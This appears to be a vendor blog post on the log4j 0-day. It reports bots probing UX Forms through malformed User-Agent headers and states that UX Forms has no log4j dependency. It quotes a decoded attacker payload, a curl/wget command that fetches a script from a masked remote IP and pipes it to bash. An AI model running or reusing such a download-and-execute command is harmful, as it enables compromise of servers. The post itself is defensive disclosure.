By now you will no doubt have heard of the 0-day vulnerability in log4j.
An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
Active scanners looking for this vulnerability
There are reports of bots actively scanning for this exploit, and we can see them in UX Forms’ logs.
These requests typically take the form of a malformed User-Agent HTTP header, as it’s an extremely easy value to change and has a high chance of being logged by the receiving service. E.g.
Decoding the end of that path shows us what the exploit is attempting to run:
(curl -s xx.xxx.xxx.xxx:5874/xx.xx.xxx.xx:443||wget -q -O- xx.xxx.xxx.xxx:5874/xx.xx.xxx.xx:443)|bash
(Digits in the real IP address have been masked with
x to avoid any mistaken copy-paste-execute-it-for-real mistakes)
In short, it’s trying to download a script from a remote endpoint on to our server then execute it in the server’s terminal. Not cool.
No impact on UX Forms
The good news is that no components in UX Forms have any version of log4j in their classpath, either as a first-degree or transitive dependency. Therefore no components of UX Forms are at risk from this exploit.
We will continue to monitor the situation, both of this specific exploit, and to be aware of any other related vulnerabilities that are discovered during the coming days and weeks.